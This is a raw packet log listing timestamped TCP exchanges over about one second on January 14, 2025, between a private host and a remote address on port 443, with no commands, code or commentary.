Jan 14, 2025 17:01:58.345447063 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.345452070 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.345705986 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.346096039 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.346101046 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.349781036 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.349816084 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.349880934 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.349889040 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.349947929 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.431162119 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.431241989 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.431354046 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.431399107 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.431411982 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.431427956 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.431480885 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.431510925 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.431516886 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.431709051 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.432018042 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.432096004 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.432113886 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.432118893 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.432156086 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.432162046 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.432166100 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.432216883 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.432221889 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.432281971 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.432926893 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.433049917 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.433079004 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.433114052 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.433119059 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.433146954 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.433170080 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.433176041 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.433294058 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.433949947 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.434024096 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.434091091 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.434094906 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.434298038 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.525271893 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.525340080 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.525376081 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.525409937 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.525439978 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.525477886 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.525489092 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.525696993 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.525758982 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.525768042 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.525779963 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.525818110 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.525866985 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.525866985 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.525873899 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.526542902 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.526772976 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.526798964 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.526803970 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.526820898 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.526839018 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.526880026 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.526884079 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.526933908 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.527647972 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.527708054 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.527714014 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.527760983 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.527765989 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.527811050 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.528377056 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.528469086 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.528495073 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.528500080 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.528528929 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.573256969 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.611737013 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.612030029 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.612042904 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.612076998 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.612090111 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.612116098 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.612194061 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.612245083 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.612329006 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.612415075 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.612435102 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.612488031 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.612519979 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.612574100 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.612689972 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.612754107 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.612940073 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.612993002 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.613039970 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.613086939 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.613132000 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.613179922 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.613224030 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.613281965 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.613792896 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.613857031 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.613894939 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.613964081 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.614012003 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.614078999 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.614114046 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.614317894 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.614666939 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.614737988 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.698103905 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.698163033 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.698199987 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.698220015 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.698234081 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.698244095 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.698277950 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.698291063 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.698302984 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.698323965 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.698349953 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.698402882 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.698409081 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.698442936 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.698443890 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.698451996 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.698561907 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.698623896 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.698676109 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.698693991 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.698736906 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.698885918 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.698936939 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.698936939 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.698946953 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.698976994 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.698983908 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.698987961 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.699049950 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.699712038 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.699749947 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.699805021 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.699809074 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.699836016 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.700510025 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.700527906 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.700570107 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.700577974 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.700617075 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.700706005 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.700732946 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.700786114 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.700788975 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.700828075 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.701626062 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.701642990 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.701714993 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.701723099 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.701771021 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.701776028 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.701793909 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.701836109 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.701839924 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.745177984 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.784804106 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.784832001 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.784893036 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.784929991 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.784975052 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.784986973 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.785037994 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.785248041 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.785263062 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.785320997 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.785326958 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.785358906 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.785562038 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.785583019 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.785634995 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.785640955 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.785671949 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.789396048 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.789414883 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.789503098 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.789514065 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.789544106 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.789563894 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.789592981 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.789598942 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.789628029 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.789911032 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.789926052 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.789967060 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.789974928 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.789993048 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.790263891 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.790286064 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.790313959 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.790319920 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.790354013 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.803129911 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.803339005 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.871553898 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.871573925 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.871622086 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.871661901 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.871685028 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.871700048 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.871714115 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.871726036 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.871742010 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.871764898 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.871783972 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.871793985 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.871803999 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.871840954 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.871866941 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.876205921 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.876221895 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.876288891 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.876298904 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.879565001 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.890393972 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.890409946 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.890487909 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.890500069 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.891741991 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.904568911 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.904587030 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.904674053 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.904690981 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.906239986 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.918855906 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.918875933 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.918970108 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.918987989 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.919765949 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.972564936 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.972584963 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.972706079 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.972718000 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.972767115 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.986896038 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.986963034 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.987020016 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:58.987032890 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:58.987070084 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.000936985 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.000955105 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.001055002 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.001075029 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.001111031 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.001142025 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.015371084 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.015419006 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.015500069 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.015511036 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.015575886 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.036850929 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.036911011 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.036937952 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.036947966 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.036986113 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.052290916 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.052311897 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.052417040 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.052436113 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.052472115 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.066356897 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.066374063 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.066487074 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.066514015 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.066550970 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.080796957 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.080813885 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.080905914 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.080916882 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.080950975 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.080971003 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.080981970 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.080987930 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.081028938 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.081054926 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.081069946 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.081110954 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.081116915 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.081159115 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.081207991 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.081223011 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.081262112 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.081269026 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.081298113 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.081341982 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.081357956 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.081398964 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.081403971 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.081439018 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.081492901 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.081507921 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.081533909 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.081538916 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.081561089 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.081578016 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.081582069 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.081594944 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.081612110 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.081635952 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.081671000 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.081675053 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.081707001 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.081759930 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.081778049 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.081801891 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.081806898 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.081835985 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.081854105 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.087925911 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.087943077 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.088027954 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.088036060 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.088073969 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.095530987 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.129681110 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.129699945 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.129766941 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.129775047 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.129833937 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.130238056 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.130253077 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.130290985 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.130300045 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.130342960 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.130549908 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.130569935 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.130597115 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.130603075 CET	443	49702	172.67.215.98	192.168.2.7
